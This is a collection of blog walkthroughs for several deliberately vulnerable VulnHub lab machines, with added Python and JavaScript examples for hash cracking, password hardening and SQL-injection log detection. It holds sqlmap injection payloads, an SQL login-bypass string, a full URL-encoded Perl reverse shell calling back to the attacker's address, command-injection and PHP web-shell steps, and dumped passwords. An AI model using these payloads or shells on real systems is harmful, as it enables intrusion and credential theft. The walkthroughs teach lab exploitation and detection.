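An added Python example (not from the post) showing why the unsalted MD5 column above falls immediately and what the application should have stored instead: the hashes are copied from the dump, the wordlist is a small constructed one, and the `store_password`/`verify_password` pair beside the audit uses a per-user random salt with iterated PBKDF2-HMAC-SHA256, so a cracker cannot reuse one digest computation across every account.

```python
import hashlib
import hmac
import os
from typing import Dict, Iterable, Optional

# Hashes copied from the users table dumped above (unsalted MD5 of the password).
DUMPED_HASHES = {
    "julia@localhost.localdomain":   "ed2539fe892d2c52c42a440354e8e3d5",
    "leon@localhost.localdomain":    "5d93ceb70e2bf5daa84ec3d0cd2c731a",
    "michael@localhost.localdomain": "9c42a1346e333a770904b2a2b37fa7d3",
    "foo@bar.com":                   "4cb9c8a8048fd02294477fcb1a41191a",
    "test@nowhere.com":              "098f6bcd4621d373cade4e832627b4f6",
    "john@localhost.localdomain":    "0d9ff2a4396d6939f80ffe09b1280ee1",
}

# Constructed wordlist: a few common choices plus the values sqlmap printed above.
WORDLIST = ["password", "123456", "test", "changeme", "madrid", "qwer1234", "somepassword"]


def audit_unsalted_md5(hashes: Dict[str, str], wordlist: Iterable[str]) -> Dict[str, Optional[str]]:
    """Map each account to the recovered password, or None if nothing in the wordlist matched.

    One MD5 per candidate covers every account at once: that is exactly what the missing
    salt buys an attacker, and why the dump above was cracked in the time it took to print.
    """
    lookup = {hashlib.md5(w.encode()).hexdigest(): w for w in wordlist}
    return {user: lookup.get(h.lower()) for user, h in hashes.items()}


# Hardened alternative: per-user random salt plus an iterated key derivation function.
PBKDF2_ITERATIONS = 600_000


def store_password(password: str, salt: Optional[bytes] = None) -> str:
    """Return 'pbkdf2_sha256$iterations$salt_hex$hash_hex'; a fresh 16-byte salt unless given."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return f"pbkdf2_sha256${PBKDF2_ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; compare in constant time."""
    algo, iterations, salt_hex, hash_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(digest.hex(), hash_hex)


if __name__ == "__main__":
    for user, pw in audit_unsalted_md5(DUMPED_HASHES, WORDLIST).items():
        print(f"{user:32} {pw if pw is not None else '<not in wordlist>'}")
    record = store_password("madrid")
    print(record)
    print(verify_password("madrid", record), verify_password("Madrid", record))
```

Accounts the audit leaves at None are not safe, only absent from this tiny wordlist; the fix is the storage scheme, not a longer password.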

We know that the box is running an SSH service, so we try to log in to the box hoping that at least one user would have reused their password for SSH.

We SSH into the box as julia and, since she is in the wheel group, we can immediately escalate our privileges to root with sudo :-) Simple and easy.

ssh julia@192.168.116.139
julia@192.168.116.139's password:
Last login: Thu Jan 28 17:58:01 2016 from 192.168.116.137
[julia@localhost ~]$ id
uid=506(julia) gid=506(julia) groups=506(julia),10(wheel),511(sales) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[julia@localhost ~]$ sudo /bin/bash
[sudo] password for julia:
[root@localhost julia]#



Sunday, 7 February 2016

Walkthrough TopHatSec Freshly

Mission `Freshly` VM: I downloaded the virtual machine hosted at https://www.vulnhub.com/entry/tophatsec-freshly,118/. There are a couple of challenges from TopHatSec and I would like to try them both. Well, for starters, here is `Freshly` :-)

Detailed steps for getting root:

An nmap scan of the box reveals that ports 80, 443 and 8080 are publicly accessible on the box.


We quickly run both nikto and dirbuster against the web server. We see that the VM is running a login application on port 80, while on the other ports it is running a WordPress blog.


Login prompt 
Wordpress blog
We also see an installation of phpMyAdmin on the web server. We try the default credentials but don't succeed. Since there is a phpMyAdmin running on the box we guess that there may be a MySQL server running at the backend as well. Hence we try a MySQL authentication bypass by using wronguser' or 1=1 LIMIT 1;# as the username and junk as the password. However, we are not successful. In spite of this, it's worth the effort to run sqlmap against the server to see if it can pick up some injection points in either the username or password fields.

sqlmap -o -u http://192.168.116.135/login.php --forms --dbs
POST parameter 'user' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 111 HTTP(s) requests:
---
Parameter: user (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: user=VXNQ' AND (SELECT * FROM (SELECT(SLEEP(5)))BNMi) AND 'EOBB'='EOBB&password=&s=Submit
---
do you want to exploit this SQL injection? [Y/n] y
[05:29:12] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL 5.0.12


sqlmap tells us that the `user` parameter of the login form is susceptible to a MySQL injection vulnerability. It readily exploits this vulnerability for us to give a complete dump of the database when we use the --dump option.
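Both this login-form injection and the /newsletter one from the LampSecurity 7 post above leave the same fingerprints in the web server's logs. As an added example (not from either post), here is a Python detector run over a few constructed Apache access-log lines and form bodies carrying the payload shapes sqlmap used in both: boolean tautology, error-based FLOOR(RAND(0)*2), time-based SLEEP(), UNION ALL SELECT NULL, and a quote-balanced comparison. The log lines and bodies are constructed, and the POST bodies are assumed to come from an application or WAF audit log, since access logs never record them.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote_plus

# Payload shapes taken from the sqlmap output in these two walkthroughs.
SIGNATURES = [
    ("boolean-tautology", re.compile(r"\bAND\s+(\d+)\s*=\s*\1\b", re.I)),
    ("error-based-floor-rand", re.compile(r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I)),
    ("time-based-sleep", re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.I)),
    ("union-select", re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I)),
    ("quoted-comparison", re.compile(r"'\s*=\s*'|'\s*(?:--|#)", re.I)),
]

# (method, request-target, percent-encoded body or None). Bodies are never in the
# access log, so a POST record has to come from the application or a WAF audit log.
Request = Tuple[str, str, Optional[str]]

LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def request_from_log_line(line: str) -> Request:
    """Pull method and request-target out of a combined-format access-log line."""
    m = LOG_RE.search(line)
    if not m:
        raise ValueError(f"not an access-log request line: {line!r}")
    return (m.group("method"), m.group("target"), None)


def decode(s: str) -> str:
    # Decode twice: clients percent-encode once, and double-encoding is a common evasion.
    return unquote_plus(unquote_plus(s))


def classify(req: Request) -> List[str]:
    """Return the names of every signature that fires on the decoded target and body."""
    _method, target, body = req
    text = decode(target) + ("\n" + decode(body) if body else "")
    return [name for name, rx in SIGNATURES if rx.search(text)]


def flagged_indices(requests: List[Request]) -> List[int]:
    """Positions of the requests that tripped at least one signature."""
    return [i for i, req in enumerate(requests) if classify(req)]


# Constructed samples: one benign and three injected GET lines shaped like the
# LampSecurity 7 /newsletter probes, then one injected and one benign login POST
# shaped like the Freshly form.
SAMPLE_REQUESTS: List[Request] = [
    request_from_log_line('192.0.2.10 - - [28/Jan/2016:11:47:12 -0500] '
                          '"GET /newsletter&id=1 HTTP/1.1" 200 5120'),
    request_from_log_line('192.0.2.10 - - [28/Jan/2016:11:47:14 -0500] '
                          '"GET /newsletter&id=1%20AND%206207=6207 HTTP/1.1" 200 5120'),
    request_from_log_line('192.0.2.10 - - [28/Jan/2016:11:47:14 -0500] '
                          '"GET /newsletter&id=1%20AND%20(SELECT%202804%20FROM(SELECT%20COUNT(*),'
                          'CONCAT(0x71,(SELECT%20(ELT(2804=2804,1))),0x71,FLOOR(RAND(0)*2))x'
                          '%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a) '
                          'HTTP/1.1" 500 1024'),
    request_from_log_line('192.0.2.10 - - [28/Jan/2016:11:47:15 -0500] '
                          '"GET /newsletter&id=-9786%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,'
                          'NULL,NULL--%20- HTTP/1.1" 200 4096'),
    ("POST", "/login.php",
     "user=VXNQ'+AND+(SELECT+*+FROM+(SELECT(SLEEP(5)))BNMi)+AND+'EOBB'%3D'EOBB&password=&s=Submit"),
    ("POST", "/login.php", "user=alice%40example.com&password=hunter2&s=Submit"),
]

if __name__ == "__main__":
    for i, req in enumerate(SAMPLE_REQUESTS):
        print(i, req[0], req[1], classify(req) or "clean")
```

Signature matching is a triage aid, not a fix; the underlying defect in both boxes is the unparameterised query, and the time-based payload is also visible as a cluster of responses delayed by a round number of seconds.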


sqlmap -o -u http://192.168.116.135/login.php --forms --dump --dbs
....
....
....
05:54:23] [INFO] resumed: wordpress8080
available databases [7]:
[*] information_schema
[*] login
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] users
[*] wordpress8080

Excellent! Now we can see that there are a total of 7 databases on the server. We must check out the interesting ones, especially login, phpmyadmin, users and wordpress8080.

1) TABLE LOGIN
05:53:38] [INFO] analyzing table dump for possible password hashes
Database: login
Table: users
[2 entries]
+----------+-----------+
| password | user_name |
+----------+-----------+
| password | candyshop |
| PopRocks | Sir |
+----------+-----------+
2) TABLE wordpress8080
Database: wordpress8080
Table: users
[1 entry]
+----------+---------------------+
| username | password |
+----------+---------------------+
| admin | SuperSecretPassword |
+----------+---------------------+
3) TABLE users
[06:03:42] [WARNING] database 'users' appears to be empty
[06:03:42] [ERROR] unable to retrieve the table names for any database
do you want to use common table existence check? [y/N/q] n
[06:03:50] [CRITICAL] unable to retrieve the tables in database 'users'
4) TABLE phpmyadmin
Database: phpmyadmin
Table: pma_table_info
[0 entries]
+---------+------------+---------------+
| db_name | table_name | display_field |
+---------+------------+---------------+
+---------+------------+---------------+
Database: phpmyadmin
Table: pma_relation
[0 entries]
+-----------+------------+--------------+--------------+---------------+---------------+
| master_db | foreign_db | master_table | master_field | foreign_table | foreign_field |
+-----------+------------+--------------+--------------+---------------+---------------+
+-----------+------------+--------------+--------------+---------------+---------------+
[WARNING] table 'pma_table_uiprefs' in database 'phpmyadmin' appears to be empty
Database: phpmyadmin
Table: pma_table_uiprefs
[0 entries]
+-------+---------+----------+------------+-------------+
| prefs | db_name | username | table_name | last_update |
+-------+---------+----------+------------+-------------+
+-------+---------+----------+------------+-------------+
Seems the rest of the tables of the phpmyadmin database are empty as well.


It seems that the table dump for the wordpress8080 database contains the admin password for the wordpress blog. We try to log in to the wordpress blog with these credentials and we are successful!


Once we have admin credentials on the wordpress site, getting a shell on the box is extremely simple. By default wordpress will not allow any php content to be run from the wordpress articles/posts. However, since we have admin privileges on the wordpress site, we can install a plugin called Exec-PHP to allow php code to run in the wordpress pages.

We install the plugin on our wordpress installation and then follow the instructions at https://wordpress.org/plugins/exec-php/installation/ to run php code in the article body. Once the simple php hello world example works we use the php-reverse-shell script available at http://pentestmonkey.net/tools/web-shells/php-reverse-shell . We set up a netcat listener and sure enough we get our shell :-)


nc -lvnp 4545
listening on [any] 4545 ...
connect to [192.168.116.128] from (UNKNOWN) [192.168.116.135] 57118
Linux Freshly 3.13.0-45-generic #74-Ubuntu SMP Tue Jan 13 19:37:48 UTC 2015 i686 i686 i686 GNU/Linux
02:30:03 up 3:21, 0 users, load average: 4.19, 4.26, 4.75
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1(daemon) gid=1(daemon) groups=1(daemon)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
daemon@Freshly:/home/user$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
user:x:1000:1000:user,,,:/home/user:/bin/bash
mysql:x:103:111:MySQL Server,,,:/nonexistent:/bin/false
candycane:x:1001:1001::/home/candycane:
# YOU STOLE MY SECRET FILE!
# SECRET = "NOBODY EVER GOES IN, AND NOBODY EVER COMES OUT!"
daemon@Freshly:/home/user$ cat /etc/issue
cat /etc/issue
Ubuntu 14.04.1 LTS \n \l

There we have our flag. A fun challenge indeed :-) 

Wednesday, 27 January 2016

Walkthrough Acid server



Mission : Get the root flag on `Acid`, which is a deliberately vulnerable virtual machine hosted at https://www.vulnhub.com/. The virtual machine can be downloaded at https://www.vulnhub.com/entry/acid-server,125/. I quickly loaded up the virtual machine into my VMWare Player and I was good to go!

Detailed Steps for getting root:

An nmap scan of the box reveals only one service running, on a non-default port. It seems that this http service is the only thing running on the box.

nmap -p 1-65500 -v -A 192.168.116.131
Starting Nmap 6.47 ( http://nmap.org ) at 2016-01-27 10:04 EST
NSE: Loaded 118 scripts for scanning.
NSE: Script Pre-scanning.
Initiating ARP Ping Scan at 10:04
Scanning 192.168.116.131 [1 port]
Completed ARP Ping Scan at 10:04, 0.00s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 10:04
Completed Parallel DNS resolution of 1 host. at 10:04, 13.00s elapsed
Initiating SYN Stealth Scan at 10:04
Scanning 192.168.116.131 [65500 ports]
Discovered open port 33447/tcp on 192.168.116.131
Completed SYN Stealth Scan at 10:04, 1.03s elapsed (65500 total ports)
Initiating Service scan at 10:04
Scanning 1 service on 192.168.116.131
Completed Service scan at 10:04, 11.02s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against 192.168.116.131
NSE: Script scanning 192.168.116.131.
Initiating NSE at 10:05
Completed NSE at 10:05, 0.08s elapsed
Nmap scan report for 192.168.116.131
Host is up (0.00059s latency).
Not shown: 65499 closed ports
PORT STATE SERVICE VERSION
33447/tcp open http Apache httpd 2.4.10 ((Ubuntu))
|_http-methods: GET HEAD POST OPTIONS
|_http-title: /Challenge
MAC Address: 00:0C:29:CF:6D:41 (VMware)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.11 - 3.14
Uptime guess: 0.293 days (since Wed Jan 27 03:03:41 2016)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros
TRACEROUTE
HOP RTT ADDRESS
1 0.59 ms 192.168.116.131


Upon accessing the http service on port 33447 we are presented with a "Welcome to the world of acid" webpage.


Acid Page


Our first instinct is always to view the source code of the page to see if there is anything interesting, and sure enough we are lucky: in this case we find a hidden comment, "643239334c6d70775a773d3d". It seems that it is hex. We convert the hex to ASCII to get "d293LmpwZw==". The == at the end tells us that it is base64 encoded. We quickly decode the string to wow.jpg! Let's see if we can use this image later.
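As an added example (not code from the original post), the two-step decode above can be written as a small layer-peeling routine that tries a hex layer, then a base64 layer, and stops when the result no longer looks encoded; the detection rules and the hex-before-base64 ordering are my assumptions.

```javascript
// Added example (not code from the original post). Peels nested encodings off a
// string found in page source, like the hidden Acid comment
// "643239334c6d70775a773d3d" -> "d293LmpwZw==" -> "wow.jpg".
// Assumptions: a hex layer is tried before a base64 layer (every hex string
// also matches the base64 alphabet), and a layer only counts when its output
// is printable ASCII.

const HEX_RE = /^(?:[0-9a-f]{2})+$/i;
const B64_RE = /^[A-Za-z0-9+/]+={0,2}$/;

// True when every byte is printable ASCII (space through tilde).
function isPrintable(buf) {
  return buf.length > 0 && [...buf].every((b) => b >= 0x20 && b <= 0x7e);
}

// Try to remove one encoding layer; returns { encoding, value } or null.
function peelOne(s) {
  if (HEX_RE.test(s)) {
    const out = Buffer.from(s, 'hex');
    if (isPrintable(out)) return { encoding: 'hex', value: out.toString('latin1') };
  }
  if (B64_RE.test(s) && s.length % 4 === 0) {
    const out = Buffer.from(s, 'base64');
    // Re-encode and compare so that a non-canonical or accidental match
    // (an arbitrary alphanumeric word) is not reported as base64.
    if (isPrintable(out) && out.toString('base64') === s) {
      return { encoding: 'base64', value: out.toString('latin1') };
    }
  }
  return null;
}

// Repeatedly peel layers; returns the steps taken, innermost result last.
// maxLayers guards against pathological input that keeps decoding forever.
function peelEncodings(s, maxLayers = 8) {
  const steps = [];
  let cur = s;
  for (let i = 0; i < maxLayers; i++) {
    const step = peelOne(cur);
    if (step === null) break;
    steps.push(step);
    cur = step.value;
  }
  return steps;
}

// The comment from the Acid login page.
console.log(peelEncodings('643239334c6d70775a773d3d'));
```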

We also see that the page title is "/Challenge", which tells us that such a folder may exist on the webserver. When we visit the /Challenge folder on the webserver we see a login page prompting for an email address and password. We can't do much now, so we run dirbuster against the webserver. Dirbuster tells us there are some interesting files and folders on the webserver.


Dirbusting /Challenge directory

We also interact with the login page via Burp Suite to better understand the way the form interacts with the backend webserver. We can see that the form converts the password into a hash using an API from the included javascript files, namely sha512.js and forms.js. We look into these files and see that they are in fact part of a php login system called "phpSecureLogin" (https://github.com/peredurabefrog/phpSecureLogin). It seems that the project has been abandoned, but we find that the github page lists default credentials (email: test@example.com, password: 6ZaxN2Vzm9NUJT2y) built into the login system. We use them and we successfully bypass the login screen!


Login form showing the includes javascript files

Once we log in we have a look at all the files listed by dirbuster. When we view cake.php we see that the page title changes to /Magic_Box, hinting that there may be something with that name on the webserver.



It seems that we don't have permission to view the /Challenge/Magic_Box directory, but we run dirbuster against it to see if it reveals anything.


Dirbusting /Magic_Box directory

We are able to find a bunch of interesting files such as low.php, tails.php, command.php etc. It seems that command.php is a console that allows us to ping another IP. We suspect a command injection vulnerability here, and hence besides providing an IP address we provide another command such as "id", on the assumption that the backend code will neither sanitize the input nor limit execution to a single IP address command.


Command injection

Sure enough we can see that our code is being executed.



Once we can execute code on the server we attempt to get a reverse shell. We reference the reverse shell cheat sheet http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet and select the perl reverse shell after checking that nc, though installed, does not support the -e option. To be able to use the perl reverse shell we must URL encode it, and also, since the length of the IP address field is limited to a maximum of 200, we need to intercept the request in Burp before forwarding it to the webserver.

Perl reverse shell, URL encoded with http://meyerweb.com/eric/tools/dencoder/ :
perl%20-e%20%27use%20Socket%3B%24i%3D%22192.168.116.128%22%3B%24p%3D4646%3Bsocket(S%2CPF_INET%2CSOCK_STREAM%2Cgetprotobyname(%22tcp%22))%3Bif(connect(S%2Csockaddr_in(%24p%2Cinet_aton(%24i))))%7Bopen(STDIN%2C%22%3E%26S%22)%3Bopen(STDOUT%2C%22%3E%26S%22)%3Bopen(STDERR%2C%22%3E%26S%22)%3Bexec(%22%2Fbin%2Fsh%20-i%22)%3B%7D%3B%27


Burp intercept


Sure enough we get our low priv shell !

nc -lvnp 4646
listening on [any] 4646 ...
connect to [192.168.116.128] from (UNKNOWN) [192.168.116.131] 38795
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ uname -a
Linux acid 3.19.0-15-generic #15-Ubuntu SMP Thu Apr 16 23:32:01 UTC 2015 i686 i686 i686 GNU/Linux
$

Privilege Escalation : 
Escalating privileges on the box takes quite a long time. Once we have a low shell we peep into all the files present in the Challenge and Magic_Box directories. We see that the box is running a MySQL service and the file psl-config.php contains the database password.

$ cat psl-config.php
<?php
define("HOST", "localhost"); // The host you want to connect to.
define("USER", "root"); // The database username.
define("PASSWORD", "mehak"); // The database password.
define("DATABASE", "secure_login"); // The database name.


In the database we check the secure_login database to find a few users and their password hashes and password salts. We attempt to crack the hashes (saman & Vivek), but since the passwords are salted we won't be able to crack them. At this point we give up on the database. We slowly follow the privilege escalation guide https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ until we finally see an interesting file on the box by enumerating all the files owned by the users acid and Vivek.

$ find / -user acid 2>/dev/null
/sbin/raw_vs_isi/hint.pcapng
/bin/pwn_me
/bin/pwn_me/chkrootkit.lsm
/bin/pwn_me/chkrootkit
/bin/pwn_me/README.chkwtmp
/bin/pwn_me/ACKNOWLEDGMENTS
/bin/pwn_me/chkdirs.c
/bin/pwn_me/ifpromisc.c
/bin/pwn_me/Makefile
..................
...................


The pcap file is interesting and we download it and open it in wireshark. We guess that we should look into the TCP communication captured on the network interface and hence set the wireshark filter to the same. Then we follow the TCP stream to see the data exchanged in the session. And sure enough we get our next clue.



Looking at the message we guess the saman user's password. Also, always check if the user is in the sudoers list. This gives us root!

www-data@acid:/sbin/raw_vs_isi$ su saman
su saman
Password: 1337hax0r
saman@acid:/sbin/raw_vs_isi$ id
id
uid=1001(saman) gid=1001(saman) groups=1001(saman)
saman@acid:/sbin/raw_vs_isi$ whoami
whoami
saman
saman@acid:~$
saman@acid:~$ sudo /bin/bash
sudo /bin/bash
[sudo] password for saman: 1337hax0r
root@acid:~#
root@acid:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@acid:~#
Wednesday, 13 January 2016

Walkthrough Vulnix

Mission : Get the root flag on `Pipe`, which is a deliberately vulnerable virtual machine hosted at https://www.vulnhub.com/. The virtual machine can be downloaded at https://www.vulnhub.com/entry/hacklab-vulnix,48/. I quickly loaded up the virtual machine into my VMWare Player and I was good to go!

Detailed Steps for getting root:

An nmap scan of the box reveals a number of services running on the box, such as ssh, smtp, finger, pop3, imap, rlogin, rexec, rshell and nfs.

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 10:cd:9e:a0:e4:e0:30:24:3e:bd:67:5f:75:4a:33:bf (DSA)
| 2048 bc:f9:24:07:2f:cb:76:80:0d:27:a6:48:52:0a:24:3a (RSA)
|_ 256 4d:bb:4a:c1:18:e8:da:d1:82:6f:58:52:9c:ee:34:5f (ECDSA)
25/tcp open smtp Postfix smtpd
|_smtp-commands: vulnix, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
| ssl-cert: Subject: commonName=vulnix
| Issuer: commonName=vulnix
| Public Key type: rsa
| Public Key bits: 2048
| Not valid before: 2012-09-02T16:40:12+00:00
| Not valid after: 2022-08-31T16:40:12+00:00
| MD5: 58e3 f1ac fef6 b6d1 744c 836f ba24 4f0a
|_SHA-1: 712f 69ba 8c54 32e5 711c 898b 55ab 0a83 44a0 420b
|_ssl-date: 2016-01-10T20:23:58+00:00; +8h00m00s from local time.
79/tcp open finger Linux fingerd
|_finger: No one logged on.
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: TOP CAPA RESP-CODES SASL UIDL STLS PIPELINING
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/udp nfs
| 100005 1,2,3 33679/tcp mountd
| 100005 1,2,3 53650/udp mountd
| 100021 1,3,4 33225/tcp nlockmgr
| 100021 1,3,4 54495/udp nlockmgr
| 100024 1 47591/udp status
| 100024 1 51009/tcp status
| 100227 2,3 2049/tcp nfs_acl
|_ 100227 2,3 2049/udp nfs_acl
143/tcp open imap Dovecot imapd
|_imap-capabilities: IDLE have ENABLE ID listed LOGIN-REFERRALS post-login more capabilities Pre-login OK LOGINDISABLEDA0001 STARTTLS SASL-IR LITERAL+ IMAP4rev1
512/tcp open exec netkit-rsh rexecd
513/tcp open login?
514/tcp open shell?
993/tcp open ssl/imap Dovecot imapd
|_imap-capabilities: IDLE have ENABLE ID LOGIN-REFERRALS post-login more listed capabilities OK Pre-login IMAP4rev1 SASL-IR LITERAL+ AUTH=PLAINA0001
| ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server
| Issuer: commonName=vulnix/organizationName=Dovecot mail server
| Public Key type: rsa
| Public Key bits: 2048
| Not valid before: 2012-09-02T16:40:22+00:00
| Not valid after: 2022-09-02T16:40:22+00:00
| MD5: 2b3f 3e28 c85d e10c 7b7a 2435 c5e7 84fc
|_SHA-1: 4a49 a407 01f1 37c8 81a3 4519 981b 1eee 6856 348e
|_ssl-date: 2016-01-10T20:23:48+00:00; +8h00m01s from local time.
995/tcp open ssl/pop3 Dovecot pop3d
|_pop3-capabilities: TOP CAPA RESP-CODES USER UIDL SASL(PLAIN) PIPELINING
| ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server
| Issuer: commonName=vulnix/organizationName=Dovecot mail server
| Public Key type: rsa
| Public Key bits: 2048
| Not valid before: 2012-09-02T16:40:22+00:00
| Not valid after: 2022-09-02T16:40:22+00:00
| MD5: 2b3f 3e28 c85d e10c 7b7a 2435 c5e7 84fc
|_SHA-1: 4a49 a407 01f1 37c8 81a3 4519 981b 1eee 6856 348e
|_ssl-date: 2016-01-10T20:23:48+00:00; +8h00m01s from local time.
2049/tcp open nfs 2-4 (RPC #100003)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/udp nfs
| 100005 1,2,3 33679/tcp mountd
| 100005 1,2,3 53650/udp mountd
| 100021 1,3,4 33225/tcp nlockmgr
| 100021 1,3,4 54495/udp nlockmgr
| 100024 1 47591/udp status
| 100024 1 51009/tcp status
| 100227 2,3 2049/tcp nfs_acl
|_ 100227 2,3 2049/udp nfs_acl
MAC Address: 00:0C:29:FA:14:AD (VMware)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10
Uptime guess: 198.841 days (since Thu Jun 25 12:13:22 2015)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: vulnix; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Our attention is drawn to a number of services which we would typically not see exposed, such as finger, the rlogin services and nfs. The NFS protocol allows a user on a client system to access a folder on the network as if it were present locally. Poorly configured NFS services are known to be exploitable. [If we remember, there is an exercise in Metasploitable that deals exclusively with attacking the NFS protocol to get root.] Hence we go for this service and enumerate whether we can mount a share locally.

We see that the /home/vulnix directory can be mounted, and we mount it on our attacking box. However, we are unable to see the contents of the directory as we keep getting a permission error. We get this error because we are root on our attacking machine and we are trying to access a non-root-owned directory on the target system. We guess that this is because the NFS /etc/exports file (https://www.centos.org/docs/5/html/Deployment_Guide-en-US/s1-nfs-server-config-exports.html) may have the root_squash option turned on, which squashes the permissions of the root client down to a low-privileged user to prevent unauthorized alteration of the nfs shared directory by a client. In order to view the contents of the mounted directory we need to access the nfs share as a user with the same uid and gid as the vulnix user on the target box. Since we don't know the uid and gid of the vulnix user we do some further enumeration on the box.

We see that the smtp service is running on the box. There exists a metasploit auxiliary module that helps us enumerate all the valid user accounts on the smtp server. We use this module as follows

msf auxiliary(smtp_enum) > info
Name: SMTP User Enumeration Utility
Module: auxiliary/scanner/smtp/smtp_enum
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
==[ Alligator Security Team ]==
Heyder Andrade <heyder@alligatorteam.org>
nebulus
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
RPORT 25 yes The target port
THREADS 1 yes The number of concurrent threads
UNIXONLY true yes Skip Microsoft bannered servers when testing unix users
USER_FILE /usr/share/metasploit-framework/data/wordlists/unix_users.txt yes The file that contains a list of probable users accounts.
Description:
The SMTP service has two internal commands that allow the
enumeration of users: VRFY (confirming the names of valid users) and
EXPN (which reveals the actual address of users aliases and lists of
e-mail (mailing lists)). Through the implementation of these SMTP
commands can reveal a list of valid users.
References:
http://www.ietf.org/rfc/rfc2821.txt
http://www.osvdb.org/12551
http://cvedetails.com/cve/1999-0531/
msf auxiliary(smtp_enum) > set RHOSTS 192.168.116.129
RHOSTS => 192.168.116.129
msf auxiliary(smtp_enum) > run
[*] 192.168.116.129:25 Banner: 220 vulnix ESMTP Postfix (Ubuntu)
[+] 192.168.116.129:25 Users found: , backup, bin, daemon, games, gnats, irc, libuuid, list, lp, mail, man, messagebus, news, nobody, postmaster, proxy, sshd, sync, sys, syslog, user, uucp, www-data
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(smtp_enum) >


The module has identified a number of user accounts on the box. The `user` account catches our attention. We guess that accounts may be reused and use the finger service to determine if it is possible to log in to this box via the `user` account.

finger user@192.168.116.129
Login: user Name: user
Directory: /home/user Shell: /bin/bash
Last login Sun Jan 10 18:32 (GMT) on pts/1 from 192.168.116.128
No mail.
No Plan.
Login: dovenull Name: Dovecot login user
Directory: /nonexistent Shell: /bin/false
Never logged in.
No mail.
No Plan.


